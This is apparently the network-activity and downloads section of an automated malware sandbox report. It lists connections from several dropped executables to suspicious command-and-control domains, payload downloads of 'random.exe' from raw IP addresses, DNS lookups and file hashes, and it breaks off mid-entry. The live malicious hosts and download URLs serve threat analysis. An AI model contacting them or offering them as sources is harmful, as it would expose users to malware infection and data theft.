                        823e4bdbcb.exe
                        979 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://energyaffai.lat/api

                        HTTP Response

                        200
                      • 172.67.157.253:443
                        https://aspecteirs.lat/api
                        tls, http
                        823e4bdbcb.exe
                        978 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://aspecteirs.lat/api

                        HTTP Response

                        200
                      • 104.21.48.1:443
                        https://sustainskelet.lat/api
                        tls, http
                        823e4bdbcb.exe
                        981 B
                        4.5kB
                        9
                        9

                        HTTP Request

                        POST https://sustainskelet.lat/api

                        HTTP Response

                        200
                      • 172.67.180.113:443
                        https://treehoneyi.click/api
                        tls, http
                        fcc74b3f6b.exe
                        980 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://treehoneyi.click/api

                        HTTP Response

                        200
                      • 104.21.52.127:443
                        https://crosshuaht.lat/api
                        tls, http
                        823e4bdbcb.exe
                        978 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://crosshuaht.lat/api

                        HTTP Response

                        200
                      • 172.67.197.170:443
                        https://discokeyus.lat/api
                        tls, http
                        fcc74b3f6b.exe
                        978 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://discokeyus.lat/api

                        HTTP Response

                        200
                      • 23.214.143.155:443
                        https://steamcommunity.com/profiles/76561199724331900
                        tls, http
                        823e4bdbcb.exe
                        1.4kB
                        33.1kB
                        20
                        31

                        HTTP Request

                        GET https://steamcommunity.com/profiles/76561199724331900

                        HTTP Response

                        200
                      • 172.67.215.121:443
                        https://necklacebudi.lat/api
                        tls, http
                        fcc74b3f6b.exe
                        980 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://necklacebudi.lat/api

                        HTTP Response

                        200
                      • 104.21.64.1:443
                        https://energyaffai.lat/api
                        tls, http
                        fcc74b3f6b.exe
                        979 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://energyaffai.lat/api

                        HTTP Response

                        200
                      • 172.67.157.253:443
                        https://aspecteirs.lat/api
                        tls, http
                        fcc74b3f6b.exe
                        974 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://aspecteirs.lat/api

                        HTTP Response

                        200
                      • 104.21.48.1:443
                        https://sustainskelet.lat/api
                        tls, http
                        fcc74b3f6b.exe
                        977 B
                        4.5kB
                        9
                        9

                        HTTP Request

                        POST https://sustainskelet.lat/api

                        HTTP Response

                        200
                      • 104.21.52.127:443
                        https://crosshuaht.lat/api
                        tls, http
                        fcc74b3f6b.exe
                        974 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://crosshuaht.lat/api

                        HTTP Response

                        200
                      • 23.214.143.155:443
                        https://steamcommunity.com/profiles/76561199724331900
                        tls, http
                        fcc74b3f6b.exe
                        1.5kB
                        42.9kB
                        23
                        37

                        HTTP Request

                        GET https://steamcommunity.com/profiles/76561199724331900

                        HTTP Response

                        200
                      • 172.67.157.254:443
                        https://lev-tolstoi.com/api
                        tls, http
                        fcc74b3f6b.exe
                        979 B
                        4.5kB
                        9
                        9

                        HTTP Request

                        POST https://lev-tolstoi.com/api

                        HTTP Response

                        200
                      • 172.67.177.88:443
                        https://cheapptaxysu.click/api
                        tls, http
                        4ab1990554.exe
                        1.7kB
                        10.0kB
                        14
                        16

                        HTTP Request

                        POST https://cheapptaxysu.click/api

                        HTTP Response

                        403

                        HTTP Request

                        POST https://cheapptaxysu.click/api

                        HTTP Response

                        200
                      • 20.26.156.215:443
                        github.com
                        tls
                        7e8e0935c9.exe
                        344 B
                        179 B
                        5
                        4
                      • 98.85.100.80:443
                        httpbin.org
                        tls
                        16d019449f.exe
                        1.5kB
                        6.5kB
                        14
                        16
                      • 147.45.113.159:80
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                        http
                        16d019449f.exe
                        82.6kB
                        1.9kB
                        63
                        36

                        HTTP Request

                        POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                      • 45.77.249.79:443
                        immureprech.biz
                        tls
                        d5ca7bb125.exe
                        349 B
                        219 B
                        5
                        5
                      • 45.77.249.79:443
                        immureprech.biz
                        tls
                        d5ca7bb125.exe
                        288 B
                        219 B
                        5
                        5
                      • 45.77.249.79:443
                        deafeninggeh.biz
                        tls
                        d5ca7bb125.exe
                        350 B
                        179 B
                        5
                        4
                      • 45.77.249.79:443
                        deafeninggeh.biz
                        tls
                        d5ca7bb125.exe
                        288 B
                        219 B
                        5
                        5
                      • 23.214.143.155:443
                        https://steamcommunity.com/profiles/76561199724331900
                        tls, http
                        d5ca7bb125.exe
                        1.5kB
                        42.9kB
                        21
                        36

                        HTTP Request

                        GET https://steamcommunity.com/profiles/76561199724331900

                        HTTP Response

                        200
                      • 172.67.157.254:443
                        https://lev-tolstoi.com/api
                        tls, http
                        d5ca7bb125.exe
                        1.2kB
                        4.5kB
                        12
                        10

                        HTTP Request

                        POST https://lev-tolstoi.com/api

                        HTTP Response

                        200
                      • 185.215.113.16:80
                        http://185.215.113.16/off/random.exe
                        http
                        skotes.exe
                        150.2kB
                        8.8MB
                        3148
                        6322

                        HTTP Request

                        GET http://185.215.113.16/luma/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.215.113.16/steam/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.215.113.16/well/random.exe

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.215.113.16/off/random.exe

                        HTTP Response

                        200
                      • 20.26.156.215:443
                        github.com
                        tls
                        e57707a59c.exe
                        344 B
                        179 B
                        5
                        4
                      • 20.26.156.215:443
                        github.com
                        tls
                        e57707a59c.exe
                        344 B
                        179 B
                        5
                        4
                      • 172.67.197.170:443
                        https://discokeyus.lat/api
                        tls, http
                        dee2c68b58.exe
                        1.0kB
                        4.5kB
                        10
                        10

                        HTTP Request

                        POST https://discokeyus.lat/api

                        HTTP Response

                        200
                      • 172.67.215.121:443
                        https://necklacebudi.lat/api
                        tls, http
                        dee2c68b58.exe
                        1.0kB
                        4.4kB
                        10
                        9

                        HTTP Request

                        POST https://necklacebudi.lat/api

                        HTTP Response

                        200
                      • 104.21.64.1:443
                        https://energyaffai.lat/api
                        tls, http
                        dee2c68b58.exe
                        1.2kB
                        4.5kB
                        11
                        10

                        HTTP Request

                        POST https://energyaffai.lat/api

                        HTTP Response

                        200
                      • 185.215.113.206:80
                        http://185.215.113.206/c4becf79229cb002.php
                        http
                        718410bf88.exe
                        727 B
                        625 B
                        5
                        5

                        HTTP Request

                        GET http://185.215.113.206/

                        HTTP Response

                        200

                        HTTP Request

                        POST http://185.215.113.206/c4becf79229cb002.php

                        HTTP Response

                        200
                      • 172.67.157.253:443
                        https://aspecteirs.lat/api
                        tls, http
                        dee2c68b58.exe
                        978 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://aspecteirs.lat/api

                        HTTP Response

                        200
                      • 104.21.48.1:443
                        https://sustainskelet.lat/api
                        tls, http
                        dee2c68b58.exe
                        1.6kB
                        4.8kB
                        16
                        13

                        HTTP Request

                        POST https://sustainskelet.lat/api

                        HTTP Response

                        200
                      • 147.45.113.159:80
                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                        http
                        16d019449f.exe
                        28.6kB
                        678 B
                        24
                        9

                        HTTP Request

                        POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322

                        HTTP Response

                        504
                      • 104.21.52.127:443
                        https://crosshuaht.lat/api
                        tls, http
                        dee2c68b58.exe
                        1.9kB
                        4.5kB
                        14
                        10

                        HTTP Request

                        POST https://crosshuaht.lat/api

                        HTTP Response

                        200
                      • 127.0.0.1:51775
                        firefox.exe
                      • 127.0.0.1:51782
                        firefox.exe
                      • 172.217.18.206:443
                        https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                        tls, http2
                        firefox.exe
                        6.0kB
                        7.2kB
                        17
                        13

                        HTTP Request

                        GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      • 34.120.5.221:443
                        https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                        tls, http2
                        firefox.exe
                        3.0kB
                        12.8kB
                        18
                        19

                        HTTP Request

                        GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      • 34.120.5.221:443
                        getpocket.cdn.mozilla.net
                        firefox.exe
                        152 B
                        3
                      • 34.117.121.53:443
                        firefox-settings-attachments.cdn.mozilla.net
                        tls
                        firefox.exe
                        1.9kB
                        21.3kB
                        20
                        26
                      • 23.214.143.155:443
                        https://steamcommunity.com/profiles/76561199724331900
                        tls, http
                        dee2c68b58.exe
                        1.7kB
                        43.9kB
                        23
                        37

                        HTTP Request

                        GET https://steamcommunity.com/profiles/76561199724331900

                        HTTP Response

                        200
                      • 172.67.157.254:443
                        https://lev-tolstoi.com/api
                        tls, http
                        dee2c68b58.exe
                        975 B
                        4.4kB
                        9
                        9

                        HTTP Request

                        POST https://lev-tolstoi.com/api

                        HTTP Response

                        200
                      • 185.156.73.23:80
                        http://185.156.73.23/files/download
                        http
                        e0ef35828f.exe
                        5.8kB
                        101.8kB
                        42
                        85

                        HTTP Request

                        GET http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/dll/key

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/dll/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download
                      • 88.221.134.155:80
                        http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                        http
                        firefox.exe
                        5.3kB
                        468.6kB
                        109
                        343

                        HTTP Request

                        GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                        HTTP Response

                        200
                      • 172.217.20.174:443
                        redirector.gvt1.com
                        tls
                        firefox.exe
                        2.2kB
                        9.0kB
                        19
                        22
                      • 74.125.175.169:443
                        r4---sn-aigzrnsz.gvt1.com
                        tls
                        firefox.exe
                        230.3kB
                        8.7MB
                        3698
                        6242
                      • 185.156.73.23:80
                        http://185.156.73.23/files/download
                        http
                        e0ef35828f.exe
                        4.9kB
                        1.4kB
                        22
                        14

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download
                      • 185.156.73.23:80
                        http://185.156.73.23/files/download
                        http
                        e0ef35828f.exe
                        3.5kB
                        1.9kB
                        16
                        12

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download
                      • 8.8.8.8:53
                        pancakedipyps.click
                        dns
                        823e4bdbcb.exe
                        65 B
                        97 B
                        1
                        1

                        DNS Request

                        pancakedipyps.click

                        DNS Response

                        172.67.209.202
                        104.21.23.76

                      • 8.8.8.8:53
                        grannyejh.lat
                        dns
                        dee2c68b58.exe
                        59 B
                        124 B
                        1
                        1

                        DNS Request

                        grannyejh.lat

                      • 8.8.8.8:53
                        discokeyus.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        92 B
                        1
                        1

                        DNS Request

                        discokeyus.lat

                        DNS Response

                        172.67.197.170
                        104.21.21.99

                      • 8.8.8.8:53
                        necklacebudi.lat
                        dns
                        dee2c68b58.exe
                        62 B
                        94 B
                        1
                        1

                        DNS Request

                        necklacebudi.lat

                        DNS Response

                        172.67.215.121
                        104.21.50.254

                      • 8.8.8.8:53
                        treehoneyi.click
                        dns
                        fcc74b3f6b.exe
                        124 B
                        94 B
                        2
                        1

                        DNS Request

                        treehoneyi.click

                        DNS Request

                        treehoneyi.click

                        DNS Response

                        172.67.180.113
                        104.21.91.209

                      • 8.8.8.8:53
                        energyaffai.lat
                        dns
                        dee2c68b58.exe
                        61 B
                        173 B
                        1
                        1

                        DNS Request

                        energyaffai.lat

                        DNS Response

                        104.21.64.1
                        104.21.96.1
                        104.21.48.1
                        104.21.80.1
                        104.21.16.1
                        104.21.112.1
                        104.21.32.1

                      • 8.8.8.8:53
                        aspecteirs.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        92 B
                        1
                        1

                        DNS Request

                        aspecteirs.lat

                        DNS Response

                        172.67.157.253
                        104.21.66.85

                      • 8.8.8.8:53
                        sustainskelet.lat
                        dns
                        dee2c68b58.exe
                        63 B
                        175 B
                        1
                        1

                        DNS Request

                        sustainskelet.lat

                        DNS Response

                        104.21.48.1
                        104.21.32.1
                        104.21.80.1
                        104.21.64.1
                        104.21.112.1
                        104.21.16.1
                        104.21.96.1

                      • 8.8.8.8:53
                        crosshuaht.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        92 B
                        1
                        1

                        DNS Request

                        crosshuaht.lat

                        DNS Response

                        104.21.52.127
                        172.67.199.59

                      • 8.8.8.8:53
                        rapeflowwj.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        125 B
                        1
                        1

                        DNS Request

                        rapeflowwj.lat

                      • 8.8.8.8:53
                        steamcommunity.com
                        dns
                        dee2c68b58.exe
                        64 B
                        80 B
                        1
                        1

                        DNS Request

                        steamcommunity.com

                        DNS Response

                        23.214.143.155

                      • 8.8.8.8:53
                        lev-tolstoi.com
                        dns
                        dee2c68b58.exe
                        61 B
                        93 B
                        1
                        1

                        DNS Request

                        lev-tolstoi.com

                        DNS Response

                        172.67.157.254
                        104.21.66.86

                      • 8.8.8.8:53
                        cheapptaxysu.click
                        dns
                        4ab1990554.exe
                        64 B
                        96 B
                        1
                        1

                        DNS Request

                        cheapptaxysu.click

                        DNS Response

                        172.67.177.88
                        104.21.67.146

                      • 8.8.8.8:53
                        github.com
                        dns
                        e57707a59c.exe
                        56 B
                        72 B
                        1
                        1

                        DNS Request

                        github.com

                        DNS Response

                        20.26.156.215

                      • 8.8.8.8:53
                        httpbin.org
                        dns
                        16d019449f.exe
                        160 B
                        250 B
                        2
                        2

                        DNS Request

                        httpbin.org

                        DNS Request

                        httpbin.org

                        DNS Response

                        98.85.100.80
                        34.226.108.155

                      • 8.8.8.8:53
                        home.twentytk20pn.top
                        dns
                        16d019449f.exe
                        180 B
                        232 B
                        2
                        2

                        DNS Request

                        home.twentytk20pn.top

                        DNS Request

                        home.twentytk20pn.top

                        DNS Response

                        147.45.113.159

                      • 8.8.8.8:53
                        bellflamre.click
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        bellflamre.click

                      • 8.8.8.8:53
                        immureprech.biz
                        dns
                        d5ca7bb125.exe
                        61 B
                        109 B
                        1
                        1

                        DNS Request

                        immureprech.biz

                        DNS Response

                        45.77.249.79
                        104.131.68.180
                        178.62.201.34

                      • 8.8.8.8:53
                        deafeninggeh.biz
                        dns
                        d5ca7bb125.exe
                        62 B
                        110 B
                        1
                        1

                        DNS Request

                        deafeninggeh.biz

                        DNS Response

                        45.77.249.79
                        178.62.201.34
                        104.131.68.180

                      • 8.8.8.8:53
                        effecterectz.xyz
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        effecterectz.xyz

                      • 8.8.8.8:53
                        diffuculttan.xyz
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        diffuculttan.xyz

                      • 8.8.8.8:53
                        debonairnukk.xyz
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        debonairnukk.xyz

                      • 8.8.8.8:53
                        wrathful-jammy.cyou
                        dns
                        d5ca7bb125.exe
                        65 B
                        130 B
                        1
                        1

                        DNS Request

                        wrathful-jammy.cyou

                      • 8.8.8.8:53
                        awake-weaves.cyou
                        dns
                        d5ca7bb125.exe
                        63 B
                        128 B
                        1
                        1

                        DNS Request

                        awake-weaves.cyou

                      • 8.8.8.8:53
                        sordid-snaked.cyou
                        dns
                        d5ca7bb125.exe
                        64 B
                        129 B
                        1
                        1

                        DNS Request

                        sordid-snaked.cyou

                      • 8.8.8.8:53
                        steamcommunity.com
                        dns
                        dee2c68b58.exe
                        64 B
                        80 B
                        1
                        1

                        DNS Request

                        steamcommunity.com

                        DNS Response

                        23.214.143.155

                      • 8.8.8.8:53
                        sweepyribs.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        125 B
                        1
                        1

                        DNS Request

                        sweepyribs.lat

                      • 8.8.8.8:53
                        home.twentytk20pn.top
                        dns
                        16d019449f.exe
                        180 B
                        232 B
                        2
                        2

                        DNS Request

                        home.twentytk20pn.top

                        DNS Request

                        home.twentytk20pn.top

                        DNS Response

                        147.45.113.159

                      • 8.8.8.8:53
                        youtube.com
                        dns
                        firefox.exe
                        57 B
                        73 B
                        1
                        1

                        DNS Request

                        youtube.com

                        DNS Response

                        172.217.18.206

                      • 8.8.8.8:53
                        spocs.getpocket.com
                        dns
                        firefox.exe
                        130 B
                        131 B
                        2
                        1

                        DNS Request

                        spocs.getpocket.com

                        DNS Request

                        spocs.getpocket.com

                        DNS Response

                        34.117.188.166

                      • 8.8.8.8:53
                        getpocket.cdn.mozilla.net
                        dns
                        firefox.exe
                        142 B
                        174 B
                        2
                        1

                        DNS Request

                        getpocket.cdn.mozilla.net

                        DNS Request

                        getpocket.cdn.mozilla.net

                        DNS Response

                        34.120.5.221

                      • 8.8.8.8:53
                        youtube.com
                        dns
                        firefox.exe
                        57 B
                        73 B
                        1
                        1

                        DNS Request

                        youtube.com

                        DNS Response

                        172.217.18.206

                      • 8.8.8.8:53
                        youtube.com
                        dns
                        firefox.exe
                        57 B
                        85 B
                        1
                        1

                        DNS Request

                        youtube.com

                        DNS Response

                        2a00:1450:4007:805::200e

                      • 8.8.8.8:53
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        206 B
                        119 B
                        2
                        1

                        DNS Request

                        prod.content-signature-chains.prod.webservices.mozgcp.net

                        DNS Request

                        prod.content-signature-chains.prod.webservices.mozgcp.net

                        DNS Response

                        34.160.144.191

                      • 8.8.8.8:53
                        shavar.prod.mozaws.net
                        dns
                        firefox.exe
                        204 B
                        116 B
                        3
                        1

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Response

                        44.228.225.150
                        52.40.120.141
                        44.240.87.158

                      • 8.8.8.8:53
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        103 B
                        131 B
                        1
                        1

                        DNS Request

                        prod.content-signature-chains.prod.webservices.mozgcp.net

                        DNS Response

                        2600:1901:0:92a9::

                      • 8.8.8.8:53
                        prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        188 B
                        110 B
                        2
                        1

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Response

                        34.149.100.209

                      • 8.8.8.8:53
                        firefox-settings-attachments.cdn.mozilla.net
                        dns
                        firefox.exe
                        90 B
                        177 B
                        1
                        1

                        DNS Request

                        firefox-settings-attachments.cdn.mozilla.net

                        DNS Response

                        34.117.121.53

                      • 8.8.8.8:53
                        steamcommunity.com
                        dns
                        dee2c68b58.exe
                        192 B
                        80 B
                        3
                        1

                        DNS Request

                        steamcommunity.com

                        DNS Request

                        steamcommunity.com

                        DNS Request

                        steamcommunity.com

                        DNS Response

                        23.214.143.155

                      • 8.8.8.8:53
                        shavar.prod.mozaws.net
                        dns
                        firefox.exe
                        136 B
                        153 B
                        2
                        1

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Request

                        shavar.prod.mozaws.net

                      • 8.8.8.8:53
                        prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        282 B
                        187 B
                        3
                        1

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                      • 8.8.8.8:53
                        prod.ads.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        98 B
                        1
                        1

                        DNS Request

                        prod.ads.prod.webservices.mozgcp.net

                        DNS Response

                        34.117.188.166

                      • 8.8.8.8:53
                        prod.ads.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        175 B
                        1
                        1

                        DNS Request

                        prod.ads.prod.webservices.mozgcp.net

                      • 8.8.8.8:53
                        prod.pocket.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        98 B
                        1
                        1

                        DNS Request

                        prod.pocket.prod.cloudops.mozgcp.net

                        DNS Response

                        34.120.5.221

                      • 8.8.8.8:53
                        prod.pocket.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        110 B
                        1
                        1

                        DNS Request

                        prod.pocket.prod.cloudops.mozgcp.net

                        DNS Response

                        2600:1901:0:524c::

                      • 8.8.8.8:53
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        106 B
                        122 B
                        1
                        1

                        DNS Request

                        attachments.prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Response

                        34.117.121.53

                      • 8.8.8.8:53
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        106 B
                        199 B
                        1
                        1

                        DNS Request

                        attachments.prod.remote-settings.prod.webservices.mozgcp.net

                      • 8.8.8.8:53
                        prod.balrog.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        82 B
                        98 B
                        1
                        1

                        DNS Request

                        prod.balrog.prod.cloudops.mozgcp.net

                        DNS Response

                        35.244.181.201

                      • 8.8.8.8:53
                        prod.balrog.prod.cloudops.mozgcp.net
                        dns
                        firefox.exe
                        164 B
                        175 B
                        2
                        1

                        DNS Request

                        prod.balrog.prod.cloudops.mozgcp.net

                        DNS Request

                        prod.balrog.prod.cloudops.mozgcp.net

                      • 8.8.8.8:53
                        ciscobinary.openh264.org
                        dns
                        firefox.exe
                        140 B
                        286 B
                        2
                        1

                        DNS Request

                        ciscobinary.openh264.org

                        DNS Request

                        ciscobinary.openh264.org

                        DNS Response

                        88.221.134.155
                        88.221.134.209

                      • 8.8.8.8:53
                        a19.dscg10.akamai.net
                        dns
                        firefox.exe
                        67 B
                        99 B
                        1
                        1

                        DNS Request

                        a19.dscg10.akamai.net

                        DNS Response

                        88.221.134.209
                        88.221.134.155

                      • 8.8.8.8:53
                        a19.dscg10.akamai.net
                        dns
                        firefox.exe
                        67 B
                        123 B
                        1
                        1

                        DNS Request

                        a19.dscg10.akamai.net

                        DNS Response

                        2a02:26f0:a1::58dd:869b
                        2a02:26f0:a1::58dd:86d1

                      • 8.8.8.8:53
                        redirector.gvt1.com
                        dns
                        firefox.exe
                        65 B
                        81 B
                        1
                        1

                        DNS Request

                        redirector.gvt1.com

                        DNS Response

                        172.217.20.174

                      • 8.8.8.8:53
                        redirector.gvt1.com
                        dns
                        firefox.exe
                        65 B
                        81 B
                        1
                        1

                        DNS Request

                        redirector.gvt1.com

                        DNS Response

                        172.217.20.174

                      • 8.8.8.8:53
                        redirector.gvt1.com
                        dns
                        firefox.exe
                        65 B
                        93 B
                        1
                        1

                        DNS Request

                        redirector.gvt1.com

                        DNS Response

                        2a00:1450:4007:80c::200e

                      • 172.217.20.174:443
                        redirector.gvt1.com
                        https
                        firefox.exe
                        4.8kB
                        11.5kB
                        35
                        23
                      • 8.8.8.8:53
                        r4---sn-aigzrnsz.gvt1.com
                        dns
                        firefox.exe
                        71 B
                        116 B
                        1
                        1

                        DNS Request

                        r4---sn-aigzrnsz.gvt1.com

                        DNS Response

                        74.125.175.169

                      • 8.8.8.8:53
                        r4.sn-aigzrnsz.gvt1.com
                        dns
                        firefox.exe
                        69 B
                        85 B
                        1
                        1

                        DNS Request

                        r4.sn-aigzrnsz.gvt1.com

                        DNS Response

                        74.125.175.169

                      • 8.8.8.8:53
                        r4.sn-aigzrnsz.gvt1.com
                        dns
                        firefox.exe
                        69 B
                        97 B
                        1
                        1

                        DNS Request

                        r4.sn-aigzrnsz.gvt1.com

                        DNS Response

                        2a00:1450:4009:1b::9

                      • 74.125.175.169:443
                        r4.sn-aigzrnsz.gvt1.com
                        https
                        firefox.exe
                        4.8kB
                        8.7kB
                        11
                        9

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\download[1].htm

                        Filesize

                        1B

                        MD5

                        cfcd208495d565ef66e7dff9f98764da

                        SHA1

                        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                        SHA256

                        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                        SHA512

                        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp

                        Filesize

                        32KB

                        MD5

                        6609586aff9783b56e3184d89468ee91

                        SHA1

                        1bef94e8e9537ac12cb8fb84527aa4a9ba6af7c3

                        SHA256

                        d618e8d1b5faea62c5c90518aa0cba0edb2a33c218599367f02f0e7eba2fc829

                        SHA512

                        7f04cd97c714797731c63e6a8b7d5610a463452bf7dca222752cd40022f943bcdb67ff05700a019c56da742cd87e248b871480361b9e4c8c9655825b22cc1de2

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\cache2\entries\6653BC7BE242C21AA1988A4A42D1DEDA18231C31

                        Filesize

                        13KB

                        MD5

                        8f21993940184a062257c435039a9a9d

                        SHA1

                        9c2806d95247b9f2a11b04c6cc7419a80dd3090f

                        SHA256

                        cb3a42eda3570e11816fb030aee4e5ea17fb1ec9e566eeddf08dc8ee1a52a0b2

                        SHA512

                        c64dcd2499a97b80d297664a995add9199a898a5972de5153d67113e7aa91560014de2840e55e84b667eac2fc0327d1494b0cee556c8254039fc085a8c2de3b8

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                        Filesize

                        13KB

                        MD5

                        e2b38db749a09f4a988358aa61c25fd6

                        SHA1

                        abef9170b5c7ff4121d43511bce2051e11d0f529

                        SHA256

                        09301d20e588f492e924411328e818b67ad42c04ed2d69a840a8a002acf076a7

                        SHA512

                        38a92df596cc221c7f4aa25832e3e322426bfbf913f3f5f9a479cb36e13793193d198b8efe1031e5c61d20105f3d08d398d132cb55865af51b6d9084bb4e29d3

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                        Filesize

                        15KB

                        MD5

                        96c542dec016d9ec1ecc4dddfcbaac66

                        SHA1

                        6199f7648bb744efa58acf7b96fee85d938389e4

                        SHA256

                        7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                        SHA512

                        cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                      • C:\Users\Admin\AppData\Local\Temp\1018207001\823e4bdbcb.exe

                        Filesize

                        758KB

                        MD5

                        afd936e441bf5cbdb858e96833cc6ed3

                        SHA1

                        3491edd8c7caf9ae169e21fb58bccd29d95aefef

                        SHA256

                        c6491d7a6d70c7c51baca7436464667b4894e4989fa7c5e05068dde4699e1cbf

                        SHA512

                        928c15a1eda602b2a66a53734f3f563ab9626882104e30ee2bf5106cfd6e08ec54f96e3063f1ab89bf13be2c8822a8419f5d8ee0a3583a4c479785226051a325

                      • C:\Users\Admin\AppData\Local\Temp\1018208001\fcc74b3f6b.exe

                        Filesize

                        1.8MB

                        MD5

                        25fb9c54265bbacc7a055174479f0b70

                        SHA1

                        4af069a2ec874703a7e29023d23a1ada491b584e

                        SHA256

                        552f8be2c6b2208a89c728f68488930c661b3a06c35a20d133ef7d3c63a86b9c

                        SHA512

                        7dfd9e0f3fa2d68a6ce8c952e3b755559db73bb7a06c95ad6ed8ac16dedb49be8b8337afc07c9c682f0c4be9db291a551286353e2e2b624223487dc1c8b54668

                      • C:\Users\Admin\AppData\Local\Temp\1018209001\efa2c9faee.exe

                        Filesize

                        1.1MB

                        MD5

                        ef08a45833a7d881c90ded1952f96cb4

                        SHA1

                        f04aeeb63a1409bd916558d2c40fab8a5ed8168b

                        SHA256

                        33c236dc81af2a47d595731d6fa47269b2874b281152530fdffdda9cbeb3b501

                        SHA512

